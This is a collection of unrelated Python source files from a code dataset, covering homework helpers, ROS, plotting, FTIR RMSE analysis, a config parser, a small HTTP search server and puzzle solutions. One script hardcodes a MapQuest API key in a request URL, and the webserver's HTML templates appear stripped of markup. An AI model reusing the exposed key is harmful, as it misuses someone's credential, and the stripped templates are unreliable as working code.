\"\"\"\r\n import math\r\n squares = []\r\n i = max(0, min(s, e)) #Sets minimum perfect square to 0 or smaller input\r\n upperBound = max(s, e)\r\n while i <= upperBound:\r\n if math.isqrt(i) ** 2 == i:\r\n squares.append(i)\r\n i +=1\r\n return squares\r\n\r\ndef calSalary(h:float, r:float = 20):\r\n \"\"\"\r\n calSalary(h:float, r:float = 20)\r\n Takes a float inputs for hours (h) worked and for hourly rate (r) and calulates salary\r\n If no hourly rate is specified, a default rate of 20 will be used\r\n \"\"\"\r\n if h < 0: #\r\n print(\"Not valid Hours\")\r\n return -1\r\n elif h > 40: #overtime case\r\n return (40 * r) + ((h - 40) * r * 1.2)\r\n else: #base case\r\n return h * r * 1.0\r\n\r\ndef calLetterGrade(points:float, gradescale:list = [98, 94, 91, 88, 85, 82, 79, 76, 73, 70, 67, 64]):\r\n \"\"\"\r\n calLetterGrade(points:float, gradescale:list = [98, 94, 91, 88, 85, 82, 79, 76, 73, 70, 67, 64])\r\n Calculates letter grade (points) based on number grade and the gradescale arguement (gradescale)\r\n The gradescale arguement should be input as a list of at most 12 numbers in decending order\r\n If no gradescale list is entered, the function calculates the letter grade based on the gradescale for PiE\r\n \"\"\"\r\n lGrades = [\"A+\", \"A\", \"A-\", \"B+\", \"B\", \"B-\", \"C+\", \"C\", \"C-\", \"D+\", \"D\", \"D-\"]\r\n try:\r\n if len(gradescale) > 12:\r\n print(\"gradescale has too many entries\")\r\n return -1\r\n for i in range(0, len(gradescale)):\r\n if gradescale.count(gradescale[i]) > 1:\r\n print(\"gradescale has repeated entry\")\r\n return -1\r\n i += 1\r\n #List is valid, calculate grade:\r\n if points < 
gradescale[-1]:\r\n            return \"F\"\r\n        for j in range(0, len(gradescale)):\r\n            if points >= gradescale[j]:\r\n                return lGrades[j]\r\n    except:\r\n        return -1\r\n","repo_name":"JakeCarter0/ECE-592-HW1","sub_path":"Homework1.py","file_name":"Homework1.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36643234459","text":"#!/usr/bin/python\n\nimport rospy\nimport smach\nimport smach_ros\nfrom cob_object_detection_msgs.msg import *\nfrom cob_object_detection_msgs.srv import *\nfrom visualization_msgs.msg import Marker\n\n\nclass PublishDetectedObjects(smach.State):\n\tdef __init__(self):\n\t\tsmach.State.__init__(\n\t\t\tself,\n\t\t\toutcomes=['published'],\n\t\t\tinput_keys=['object'])\n\t\tself.color_inc = 0\n\t\tself.vis_pub = rospy.Publisher('detected_object_marker', Marker)\n\n\tdef insert_detected_object(self,detection):\n\t\tobject_label = detection.label\n\t\tobject_pose = detection.pose\n\t\tobject_bb = detection.bounding_box_lwh\n\n\t\tmarker = Marker()\n\t\tmarker.header = detection.pose.header\n\t\tmarker.ns = \"ExploreScene\"\n\t\tmarker.id = 0\n\t\tmarker.type = 1\n\t\tmarker.action = 0\n\t\tmarker.pose = object_pose.pose\n\t\tmarker.scale.x = object_bb.x\n\t\tmarker.scale.y = object_bb.y\n\t\tmarker.scale.z = object_bb.z\n\t\tmarker.color.a = 1.0\n\t\tmarker.color.r = 0.0 + self.color_inc;\n\t\tmarker.color.g = 1.0 - self.color_inc;\n\t\tmarker.color.b = 0.0 ;\n\t\n\t\tself.color_inc = self.color_inc + 0.1\n\n\t\tself.vis_pub.publish( marker );\n\n\t\n\tdef execute(self,userdata):\n\t\t#publish all detected objects\n\t\tself.insert_detected_object(userdata.object)\n\t\treturn 'published'\n\n\nclass SM(smach.StateMachine):\n\tdef __init__(self):\n\t\tsmach.StateMachine.__init__(self,outcomes=['ended'])\n\t\twith self:\n\t\t\tsmach.StateMachine.add('STATE',PublishDetectedObjects(),\n\t\t\t\ttransitions={'published':'STATE'})\n\n\t\nif __name__=='__main__':\n\trospy.init_node('PublishDetectedObjects')\n\tsm = SM()\n\tsm.userdata.object = Detection()\n\tsm.userdata.object.bounding_box_lwh.x = 0.1\n\tsm.userdata.object.bounding_box_lwh.y = 0.1\n\tsm.userdata.object.bounding_box_lwh.z = 0.1\n\tsis = smach_ros.IntrospectionServer('SM', sm, 'SM')\n\tsis.start()\n\toutcome = sm.execute()\n\trospy.spin()\n\t#sis.stop()\n\n#rospy.init_node('eHealth2012')\n#sm = SM()\n#outcome = sm.execute()\n#rospy.spin()\n\n\n","repo_name":"ipa320/cob_scenario_states","sub_path":"cob_generic_states_experimental/src/cob_generic_states_experimental/PublishDetectedObjects.py","file_name":"PublishDetectedObjects.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"11430641869","text":"'''\n@author: Pablo Seijo\n@date: 19/3/2023\n@company: USC ETSE\n@description: This code takes the geometric mean values of three measurements of cycles per cache line from three\ntxt files and, with D being the stride size in doubles (each one is 8 bytes), returns a png with a figure where we compare the plots\nfor the experiment run with double, int and direct access.\n'''\n\nimport matplotlib.pyplot as plt\nimport os\n\n# Pass in the L and D values to use later in the plots\nD_parameters = [2, 32, 128, 1024, 8192]\nL_parameters = [384, 1152, 10240, 15360, 40960, 81930, 163930]\n\n# Read the mean double values from the text file\nwith open('menoresDatosDouble.txt', 'r') as f:\n    valuesDouble = [float(x) for x in f.readlines()]\n\n# Read the mean int values from the text file\nwith open('menoresDatosInt.txt', 'r') as fp:\n    valuesInt = [float(x) for x in fp.readlines()]\n\n# Read the mean direct-access values from the text file\nwith open('menoresDatosDirecto.txt', 'r') as fpd:\n    valuesDirectAccess = [float(x) for x in fpd.readlines()]\n\n# create an array of arrays split into the groups of 7 needed to build the\n# plots, i.e. groups[0] = {list: 7} [...], and so on up to the 5 groups needed\ngroupsDouble = [valuesDouble[i:i + 7] for i in range(0, len(valuesDouble), 7)]\ngroupsInt = [valuesInt[i:i + 7] for i in range(0, len(valuesInt), 7)]\ngroupsDirectAccess = [valuesDirectAccess[i:i + 7] for i in range(0, len(valuesDirectAccess), 7)]\n\n# Create a figure with multiple lines\nfig, ax = plt.subplots()\n\n# Adjust the figure size\nfig.set_size_inches(7, 5)\n\n# Add each dataset as a new line on the same figure\nfor i, group in enumerate(groupsDouble):\n    if i == 0:\n        ax.plot(L_parameters, group, marker = 'o', markersize = 5, color='gold', label = 'Double')\n    else:\n        ax.plot(L_parameters, group, marker = 'o', markersize = 5, color='gold')\n\n\n# Add each dataset as a new line on the same figure\nfor i, group in enumerate(groupsInt):\n    if i == 0:\n        ax.plot(L_parameters, group, marker = 'o', markersize = 5, color='blueviolet', label = 'Int')\n    else:\n        ax.plot(L_parameters, group, marker = 'o', markersize = 5, color='blueviolet')\n\n\n# Add each dataset as a new line on the same figure\nfor i, group in enumerate(groupsDirectAccess):\n    if i == 0:\n        ax.plot(L_parameters, group, marker = 'o', markersize = 5, color='crimson', label = 'Direct Access')\n    else:\n        ax.plot(L_parameters, group, marker = 'o', markersize = 5, color='crimson')\n\n\n# Figure title\nax.set_title('Number of cycles for each L and D')\n\n# Names of the x and y axes\nax.set_xlabel('L parameters')\nax.set_ylabel('Number of cycles')\n\n# Add the legend\nax.legend(loc = 'best')\n\n# Save the figure to a png file\nplt.savefig('grafica.png')\n\nprint(\"Please check that the file grafica.png has been generated in the following listing: \", os.listdir())\n","repo_name":"Vehkzyr/ArqComp","sub_path":"Practica1/graficasColapsadas.py","file_name":"graficasColapsadas.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12959342106","text":"#Python RMSE FTIR comparison software\nprint (\"Software for RMSE comparison\")\nprint (\"between FTIR spectra\")\nprint (\"implemented using sklearn\")\nprint (\"Fernando Gomes / LaBioS / IMA - UFRJ\")\nprint (\"V0.1 - 03/29/21\")\nprint()\nprint()\nprint()\n# Adapted from https://mubaris.com/posts/linear-regression/\n# Importing Necessary Libraries\n#%matplotlib inline\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = (20.0, 10.0)\n\nfile = input(\"Insert your CSV file's name here (without .csv): \")\nlog = str(file)+'.log'\nhead_line = 'Samples ; RMSE ; R2'\nprint(head_line)\nwith open(log, 'a') as out:\n    out.write(head_line + '\\n')\n\n# Reading Data\ndata = 
pd.read_csv(str(file)+'.csv')\n#print(data.shape)\n#data.head()\n\n# Collecting X and Y\npos=[]\nsample=[]\nfor i in range(0,(data.shape[1])):\n pos.append(i)\n sample.append(str(data.columns[pos[i]]))\n\ncolname = data.columns[pos]\nX0 = data[colname[0]].values\nX = data[colname[1]].values\n\nfor j in range(2, data.shape[1]):\n Y = data[colname[j]].values\n ##\n ### Total number of values\n m = len(X)\n \n## from sklearn.linear_model import LinearRegression\n## from sklearn.metrics import mean_squared_error\n\n # Cannot use Rank 1 matrix in scikit learn\n X = X.reshape((m, 1))\n # Creating Model\n reg = LinearRegression()\n # Fitting training data\n reg = reg.fit(X, Y)\n # Y Prediction\n Y_pred = reg.predict(X)\n\n # Calculating RMSE and R2 Score\n mse = mean_squared_error(Y, Y_pred)\n rmse = np.sqrt(mse)\n r2_score = reg.score(X, Y)\n\n print(sample[j],np.sqrt(mse),r2_score)\n var = str(sample[1])+ '_versus_'+ str(sample[j])+';'+str(np.sqrt(mse))+';'+str(r2_score)\n with open(log, 'a') as out:\n out.write(var + '\\n')\n # Plotting Values and Regression Line\n plt.plot(X, Y_pred, color='#58b970', label='Linear fit')\n plt.scatter(X, Y, c='#ef5423', label='Scatter Plot')\n #plt.show()\n Xlabel=str(sample[1])+' - Nomalized Transmittance'\n Ylabel=str(sample[j])+' - Nomalized Transmittance'\n YlabelSpectrum=str(sample[j]+' - Nomalized Transmittance')\n plt.xlabel(Xlabel,size=22)\n plt.ylabel(Ylabel,size=22)\n plt.legend()\n plt.savefig(str(sample[1])+ '_versus_'+ str(sample[j])+'.png')\n plt.close()\n plt.xlabel('Wavenumber (cm-1)',size=22)\n plt.ylabel(YlabelSpectrum,size=22)\n plt.plot(X0, Y, color='#58b970', label='FTIR')\n plt.gca().invert_xaxis() # Tip from https://www.kite.com/python/answers/how-to-invert-the-y-axis-in-matplotlib-in-python\n plt.savefig('FTIR_'+ str(sample[j])+'.png')\n plt.close()\n","repo_name":"ftir-mc/RMSESpectraC","sub_path":"RMSESpectraC.py","file_name":"RMSESpectraC.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72158154659","text":"import hashlib\n\ndef modify(m):\n l = list(m)\n l[0] = l[0] ^ 1\n return bytes(l)\n\nm = \"this is a top secret\".encode()\n\nsha256 = hashlib.sha256()\nsha256.update(m)\ndata = sha256.digest()\n\nprint(data)\nprint(modify(m))","repo_name":"cyx977/pythoncryptography","sub_path":"src/hash_fnctions.py","file_name":"hash_fnctions.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35269731350","text":"from PySide2.QtWidgets import QMainWindow, QFileDialog, QMessageBox, QTableWidgetItem, QGraphicsScene, QDialog\nfrom ui.ui_sucursal import Ui_Dialog\nfrom PySide2.QtCore import Slot\nfrom models.sucursal import Sucursal\n\n\nclass SucursalWindow(QDialog):\n def __init__(self, sucursal=None):\n super(SucursalWindow, self).__init__()\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.sucursal = sucursal\n\n self.ui.push_cancelar.clicked.connect(self.onClose)\n self.ui.push_guardar.clicked.connect(self.onSave)\n self.ui.checkBox.setChecked(True)\n\n if sucursal is not None:\n self.ui.edit_nombre.setText(sucursal['nombre'])\n self.ui.edit_telefono.setText(sucursal['telefono'])\n self.ui.edit_direccion.setText(sucursal['direccion'])\n self.ui.checkBox.setChecked(sucursal['activo'])\n\n @Slot()\n def onClose(self):\n self.done(0)\n\n @Slot()\n def onSave(self):\n nombre = self.ui.edit_nombre.text()\n telefono = 
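The hash_fnctions.py record above flips one bit of the message but never hashes the modified copy, so the digest comparison it sets up is incomplete. A self-contained sketch of the intended demonstration (SHA-256's avalanche effect: one changed input bit scrambles the whole digest); the helper name is illustrative, not from the original repo:

import hashlib

def flip_first_bit(message: bytes) -> bytes:
    # XOR the lowest bit of the first byte, as the original modify() does.
    data = bytearray(message)
    data[0] ^= 1
    return bytes(data)

m = "this is a top secret".encode()
digest_original = hashlib.sha256(m).hexdigest()
digest_modified = hashlib.sha256(flip_first_bit(m)).hexdigest()

# A one-bit change in the input yields a completely different digest.
print(digest_original)
print(digest_modified)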
self.ui.edit_telefono.text()\n direccion = self.ui.edit_direccion.text()\n activo = self.ui.checkBox.isChecked()\n sucursal = Sucursal(\n nombre=nombre,\n telefono=telefono,\n direccion=direccion,\n activo=activo\n )\n if self.sucursal is None:\n sucursal.save()\n else:\n sucursal._key=self.sucursal['nombre']\n sucursal.update()\n self.done(0)\n","repo_name":"Fairbrook/proyecto-SBD","sub_path":"controllers/sucursal.py","file_name":"sucursal.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71850674979","text":"import unittest\nfrom expresso.append_to_chain import append_to_chain\n\nclass TestAppendToChain(unittest.TestCase):\n def test_append_to_chain(self):\n block_chain = []\n new_block = {\n 'index': 1,\n 'timestamp': '2022-07-28 12:00:00',\n 'data': 'This is block 1',\n 'previous_hash': '0'\n }\n append_to_chain(block_chain, new_block)\n self.assertEqual(len(block_chain), 1)\n self.assertEqual(block_chain[0], new_block)\n \n def test_append_to_chain_with_multiple_blocks(self):\n block_chain = []\n new_block_1 = {\n 'index': 1,\n 'timestamp': '2022-07-28 12:00:00',\n 'data': 'This is block 1',\n 'previous_hash': '0'\n }\n new_block_2 = {\n 'index': 2,\n 'timestamp': '2022-07-28 12:05:00',\n 'data': 'This is block 2',\n 'previous_hash': 'd3b07384d113edec49eaa6238ad5ff00'\n }\n append_to_chain(block_chain, new_block_1)\n append_to_chain(block_chain, new_block_2)\n self.assertEqual(len(block_chain), 2)\n self.assertEqual(block_chain[0], new_block_1)\n self.assertEqual(block_chain[1], new_block_2)\n \nif __name__ == '__main__':\n unittest.main()","repo_name":"afewell/expresso_failed_2-4","sub_path":"tests/test_append_to_chain.py","file_name":"test_append_to_chain.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3609106504","text":"\"\"\"Parse the config file.\n\n:author: Shay Hill\n:created: 2023-02-03\n\"\"\"\n\nimport configparser\nimport sys\nfrom pathlib import Path\nfrom typing import Callable\n\nCONFIG_FILE = Path(\"todoist_export.ini\")\n\nCONFIG_TEMPLATE = \"\"\"\n# Enter comma-separated lists of sections and projects to include or exclude. By\n# default, every section and project will be included.\n#\n# -- If section_whitelist is blank, all sections will be included. If even one section\n# is listed, then section_whitelist becomes a whitelist and only the listed sections\n# will be included. The same rule applies for project_whitelist.\n#\n# -- Blacklist trumps whitelist, so if a section or project is both whitelisted and\n# blacklisted, it will be excluded. There really isn't a good reason to have both a\n# whitelist and a blacklist. Just use whatever is easier for you.\n#\n# -- Any task without a section will be put in \"no section\" (all lowercase). See\n# example for how to exclude.\n#\n# -- Entries here do not need quotes. Blank spaces in section or project names are\n# fine. 
Everything is case sensitive.\n#\n# -- example entries:\n# section_whitelist = Active, Postponed, Delegated, Put on Hold\n# section_blacklist = no section, Personal, Long Section Name With Multiple Spaces\n\n[todoist.filter]\nsection_whitelist =\nproject_whitelist =\nsection_blacklist =\nproject_blacklist =\n\"\"\"\n\n\ndef create_config_file():\n \"\"\"Create a config file template if one doesn't exist.\"\"\"\n if CONFIG_FILE.exists():\n do_overwrite = input(f\"Config file '{CONFIG_FILE}' exists. Overwrite? (y/N) \")\n if do_overwrite.lower() != \"y\":\n return\n _ = CONFIG_FILE.write_text(CONFIG_TEMPLATE[1:])\n _ = sys.stdout.write(f\"Config file '{CONFIG_FILE}' created.\\n\")\n\n\ndef _read_config() -> configparser.ConfigParser:\n \"\"\"Read the config file and return a ConfigParser object.\n\n :return: A ConfigParser object with the config file loaded.\n \"\"\"\n config = configparser.ConfigParser()\n config[\"todoist.filter\"] = {\n \"section_whitelist\": \"\",\n \"project_whitelist\": \"\",\n \"section_blacklist\": \"\",\n \"project_blacklist\": \"\",\n }\n _ = config.read(\"todoist_export.ini\")\n return config\n\n\ndef _split(config_value: str) -> set[str]:\n \"\"\"Split a comma-separated string into a set of strings.\n\n :param config_value: The comma-separated string to split.\n :return: A set of (stripped) strings.\n \"\"\"\n return {y.strip() for y in config_value.split(\",\") if y.strip()}\n\n\ndef get_user_defined_filters() -> Callable[[tuple[str, str, str]], bool]:\n \"\"\"Create filters from the config file (or defaults).\n\n :return: A tuple of (section_include_filter, project_include_filter).\n \"\"\"\n config = _read_config()\n section_whitelist = _split(config[\"todoist.filter\"][\"section_whitelist\"])\n project_whitelist = _split(config[\"todoist.filter\"][\"project_whitelist\"])\n section_blacklist = _split(config[\"todoist.filter\"][\"section_blacklist\"])\n project_blacklist = _split(config[\"todoist.filter\"][\"project_blacklist\"])\n\n def filter_table(table_line: tuple[str, str, str]) -> bool:\n \"\"\"Return True if the task should be included in the export.\n\n :param table_line: (section name, project name, task content) tuple.\n :return: True if the task should be included in the export.\n \"\"\"\n section, project, _ = table_line\n if section in section_blacklist:\n return False\n if project in project_blacklist:\n return False\n if section_whitelist and section not in section_whitelist:\n return False\n if project_whitelist and project not in project_whitelist:\n return False\n return True\n\n return filter_table\n","repo_name":"ShayHill/todoist_export","sub_path":"src/todoist_export/parse_config.py","file_name":"parse_config.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3263105290","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 18 16:08:15 2017\n\n@author: Jakub-P.Lech\n\nProject Euler 10: Find the sum of all primes below 2 million\n\"\"\"\n\nfrom euler import primesLessThan\n\ndef main():\n primes = list(primesLessThan(2000000))\n print(sum(x for x in primes))\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"Jakub-L/project-euler","sub_path":"python/010.py","file_name":"010.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35295001210","text":"import json\nimport requests\nfrom airbnb import Airbnb\n\n\nwith 
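The Project Euler record above imports primesLessThan from a local euler module that is not part of this dump. A plausible generator sketch of such a helper, assuming it yields every prime below n via a Sieve of Eratosthenes:

def primesLessThan(n):
    # Sieve of Eratosthenes: yield every prime p with p < n.
    sieve = [True] * n
    for p in range(2, n):
        if sieve[p]:
            yield p
            for multiple in range(p * p, n, p):
                sieve[multiple] = False

print(sum(primesLessThan(2000000)))  # 142913828922, the well-known Euler 10 answer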
open('output.json', 'r') as fh:\n raw = fh.read()\n listings = json.loads(raw)\n\n result = []\n for listing in listings:\n pic_url = listing.get('XL Picture Url')\n if not pic_url:\n print('No pic url, skip')\n continue\n zip_code = listing.get('Zipcode')\n if not zip_code:\n print('No zipcode·, skip')\n continue\n geocode_endpoint = f'http://www.mapquestapi.com/geocoding/v1/address?key=Ss0Djui9aTLold64q5lAtzw2lcg6kiJN&location={zip_code}'\n\n res = requests.get(geocode_endpoint)\n if not res.ok:\n raise Exception(\"Unable to fetch geocode info\")\n jsonRes = res.json()\n coord = jsonRes['results'][0]['locations'][0]['latLng']\n lat = coord['lat']\n lng = coord['lng']\n\n obj = Airbnb(lat, lng)\n\n analysis = obj.process_danger_level()\n\n listing['danger_index'] = analysis.get('danger_index')\n listing['crimes_count'] = analysis.get('crimes_count')\n print(f'processed one danger_index successfully')\n\n result.append(listing)\n\n with open('alldata.json', 'w') as fh:\n fh.write(json.dumps(result))\n\n","repo_name":"tywin1104/SafeBnb-DataAnalysis","sub_path":"classifiy_airbnb.py","file_name":"classifiy_airbnb.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24835151372","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\r\nfrom urllib.parse import unquote\r\nimport urllib.parse as urllib\r\nimport os\r\nimport re\r\nfrom searchengine import SearchEngine\r\n\"\"\"\r\nThis is a response, that server sends back to the client\r\n1st peace without from and data\r\n\"\"\"\r\nresp = \"\"\"\r\n \r\n ASXER (Anya's Super indeXER)\r\n \r\n \"\"\"\r\ndata=\"\"\"\r\n
    Enter query to search\r\n    {1}\r\n    © ASXER (Anya's Super indeXER)\r\n\"\"\"\r\n\r\nclass WebServer(BaseHTTPRequestHandler):\r\n    \"\"\"\r\n    This class is used for request handling in our searchengine\r\n    \"\"\"\r\n    def do_GET(self):\r\n        \"\"\"\r\n        Default GET request from client to get site\r\n        \"\"\"\r\n        self.send_response(200)\r\n        self.send_header(\"Content-type\", \"text/html; charset=utf-8\")\r\n        self.end_headers()\r\n        response = \"\"\"\r\n            Documents Limit\r\n            Documents Offset\r\n            \"\"\"\r\n        files = os.listdir(\".\\\\\")\r\n        i = 0\r\n        for file in files:\r\n            if re.match(\".*\\.txt\", file):\r\n                response += (file + \" \")\r\n                response += 'Limit '\r\n                response += 'Offset '\r\n                response += ''\r\n                response += ''\r\n                response += ' '\r\n                i = i + 1\r\n        self.wfile.write(bytes((resp + data.format('', response)), \"utf-8\"))\r\n\r\n\r\n    def get_new_offset_limit(self, action='', action_doc='', offsets=[], limits=[]):\r\n        '''\r\n        function for getting next/prev results of research\r\n        :param action: next or back or perv\r\n        :param action_doc: for which document\r\n        :param offsets: offsets list\r\n        :param limits: limits list\r\n        :return: new offsets list\r\n        '''\r\n        doc_num = int(action_doc.replace('action', ''))\r\n        print(action)\r\n        if action == 'next':\r\n            offsets[doc_num] = str(int(offsets[doc_num]) + int(limits[doc_num]))\r\n        if action == 'back':\r\n            offsets[doc_num] = str(int(offsets[doc_num]) - int(limits[doc_num]))\r\n            if int(offsets[doc_num]) < 0:\r\n                offsets[doc_num] = str(0)\r\n        if action == 'perv':\r\n            offsets[doc_num] = str(0)\r\n        return offsets\r\n\r\n\r\n    def parse_url(self, body=''):\r\n        '''\r\n        function for parsing request string\r\n        :param body: string with parameters of request\r\n        :return: parsed parameters\r\n        '''\r\n        s = unquote(urllib.urlparse(body)[2], \"utf-8\").replace(\"b'\", \"\").replace(\"'\", \"\").replace(\"\\\"\", '')\r\n        query_data = urllib.parse_qs(s)\r\n        print(\"data = \" + str(query_data))\r\n        query = str(query_data['query'][0])\r\n        limit = str(query_data['limit'][0])\r\n        offset = str(query_data['offset'][0])\r\n        if (re.match('\\D', limit)) or (re.match('\\D', offset)):\r\n            raise TypeError\r\n        if int(limit) < 0 or int(offset) < 0:\r\n            raise TypeError\r\n        action = ''\r\n        action_doc = ''\r\n        limits = []\r\n        offsets = []\r\n        action_exists = False\r\n        for key in query_data.keys():\r\n            if re.match('action.', key):\r\n                action = str(query_data[key][0])\r\n                action_doc = str(key)\r\n                action_exists = True\r\n            if re.match('doc.limit', key):\r\n                if (re.match('\\D', query_data[key][0])) or (int(query_data[key][0]) < 0):\r\n                    raise TypeError\r\n                limits.append(query_data[key][0])\r\n            if re.match('doc.offset', key):\r\n                if (re.match('\\D', query_data[key][0])) or (int(query_data[key][0]) < 0):\r\n                    raise TypeError\r\n                offsets.append(query_data[key][0])\r\n        return query, limit, offset, limits, offsets, action, action_doc, action_exists\r\n\r\n    def do_POST(self):\r\n        \"\"\"\r\n        POST handler for query\r\n        \"\"\"\r\n        try:\r\n            content_length = int(self.headers['Content-Length'])\r\n            body = str(self.rfile.read(content_length))\r\n            print(\"body = \" + body)\r\n            query, limit, offset, limits, offsets, action, action_doc, action_exists = self.parse_url(body)\r\n            print(\"query = \" + query)\r\n            print(\"doclimit = \" + limit)\r\n            print(\"docoffset = \" + offset)\r\n            print(\"action = \" + action)\r\n            print(\"actiondoc = \" + action_doc)\r\n            if action_exists:\r\n                offsets = self.get_new_offset_limit(action, action_doc, offsets, limits)\r\n            print('limits = ' + str(limits))\r\n            print('offsets = ' + str(offsets))\r\n            search_engine = SearchEngine('database')\r\n            r = search_engine.search_limit_offset(query, 4, limit, offset, limits, offsets)\r\n            myresp = ''\r\n            myresp += 'Documents Limit '\r\n            myresp += 'Documents Offset '\r\n            key_list = list(r.keys())\r\n            key_list.sort()\r\n            j = 0\r\n            for key in key_list:\r\n                myresp += '\\n'\r\n                myresp += '1. ' + key + ' 2. \\n'\r\n                myresp += 'Limit '\r\n                myresp += 'Offset '\r\n                myresp += ''\r\n                myresp += ''\r\n                myresp += ' '\r\n                for val in r[key]:\r\n                    myresp += '• ' + val + ' • '\r\n                myresp += ' '\r\n                j = j + 1\r\n            myresp += ' '\r\n            self.send_response(200)\r\n            self.send_header(\"Content-type\", \"text/html; charset=utf-8\")\r\n            self.end_headers()\r\n            self.wfile.write(bytes((resp + data.format(query, myresp)), \"utf-8\"))\r\n        except TypeError:\r\n            response = 'fields \"limit\" and \"offset\" can not take a negative or fractional values'\r\n            self.wfile.write(bytes((resp + data.format('', response)), \"utf-8\"))\r\n        except Exception as ex:\r\n            response = 'Uuups. Something went wrong. Error message: ' + str(ex) + ' '\r\n            self.send_response(200)\r\n            self.send_header(\"Content-type\", \"text/html; charset=utf-8\")\r\n            self.end_headers()\r\n            files = os.listdir(\".\\\\\")\r\n            i = 0\r\n            response += 'Documents Limit '\r\n            response += 'Documents Offset '\r\n            for f in files:\r\n                if re.match(\".*\\.txt\", f):\r\n                    response += (f + \" \")\r\n                    response += 'Limit '\r\n                    response += 'Offset '\r\n                    response += ''\r\n                    response += ''\r\n                    response += ' '\r\n                    i = i + 1\r\n            self.wfile.write(bytes((resp + data.format('', 'Not Found
    ' + response)), \"utf-8\"))\r\n\r\n\r\nws = HTTPServer(('0.0.0.0', 80), WebServer)\r\n\r\n# Server running until Ctrl-C pressed\r\ntry:\r\n ws.serve_forever()\r\nexcept KeyboardInterrupt:\r\n pass\r\n\r\nws.server_close()\r\n","repo_name":"anyasidr/my-repository","sub_path":"webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":9025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32876069820","text":"from devices.cubelib import rgbemulator as emulator\nfrom devices.cubelib import rgbwireframe as wireframe\nfrom devices.rgbanimations import *\n\npv = emulator.ProjectionViewer(640,480)\nwf = wireframe.Wireframe()\npv.createCube(wf)\n\n\nstart = (0, 0, 0)\n\ndef cubeProcess(cube, signal, count):\n start = (0, 0, 0)\n point = (0,0)\n #planeBounce(cube,(count/20)%2+1,count%20)\n colours = [[1,0,0],[0,1,0],[0,0,1]]\n #start = wireframeExpandContractFrames(cube,start,colours[(count/7)%3],count)\n rain(cube,count,2,4,1)\n #colourCube(cube)\n #quadrantColourSwap(cube)\n #time.sleep(.1)\n #point = voxel(cube,count,point)\n #sine_wave(cube,count)\n #pyramids(cube,count)\n #side_waves(cube,count)\n #fireworks(cube,4)\n #technites(cube,count)\n #planeBounce(cube,(count/8)%3,count%8,colours[(count/8)%3])\n cube.redraw(wf, pv)\n return count + 1\n","repo_name":"NITK-Technites/LED_Wall","sub_path":"Software/src/apps/cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"15468270005","text":"from aoc_get import get_input\r\nfrom math import prod\r\n\r\ninp = get_input().splitlines()\r\n\r\ndef surround(grid):\r\n h = len(grid)\r\n w = len(grid[0])\r\n res = ['.' * (w + 2)]\r\n for i in range(h):\r\n res.append('.' + grid[i] + '.')\r\n res.append('.' * (w + 2))\r\n return res\r\n\r\ndef count_around(ii, jj, g):\r\n #up left\r\n ul = '.'\r\n i = ii - 1\r\n j = jj - 1\r\n while i > 0 and j > 0 and ul == '.':\r\n if g[i][j] != '.':\r\n ul = g[i][j]\r\n i -= 1\r\n j -= 1\r\n\r\n #up center\r\n uc = '.'\r\n i = ii - 1\r\n j = jj\r\n while i > 0 and uc == '.':\r\n if g[i][j] != '.':\r\n uc = g[i][j]\r\n i -= 1\r\n\r\n #up right\r\n ur = '.'\r\n i = ii - 1\r\n j = jj + 1\r\n while i > 0 and j < len(g[0]) and ur == '.':\r\n if g[i][j] != '.':\r\n ur = g[i][j]\r\n i -= 1\r\n j += 1\r\n\r\n #center left\r\n cl = '.'\r\n i = ii\r\n j = jj - 1\r\n while j > 0 and cl == '.':\r\n if g[i][j] != '.':\r\n cl = g[i][j]\r\n j -= 1\r\n\r\n #center right\r\n cr = '.'\r\n i = ii\r\n j = jj + 1\r\n while j < len(g[0]) and cr == '.':\r\n if g[i][j] != '.':\r\n cr = g[i][j]\r\n j += 1\r\n\r\n #down left\r\n dl = '.'\r\n i = ii + 1\r\n j = jj - 1\r\n while j > 0 and i < len(g) and dl == '.':\r\n if g[i][j] != '.':\r\n dl = g[i][j]\r\n i += 1\r\n j -= 1\r\n\r\n #down center\r\n dc = '.'\r\n i = ii + 1\r\n j = jj\r\n while i < len(g) and dc == '.':\r\n if g[i][j] != '.':\r\n dc = g[i][j]\r\n i += 1\r\n\r\n #down right\r\n dr = '.'\r\n i = ii + 1\r\n j = jj + 1\r\n while j < len(g) and i < len(g[0]) and dr == '.':\r\n if g[i][j] != '.':\r\n dr = g[i][j]\r\n i += 1\r\n j += 1\r\n\r\n #p2\r\n around = ul + uc + ur + cl + cr + dl + dc + 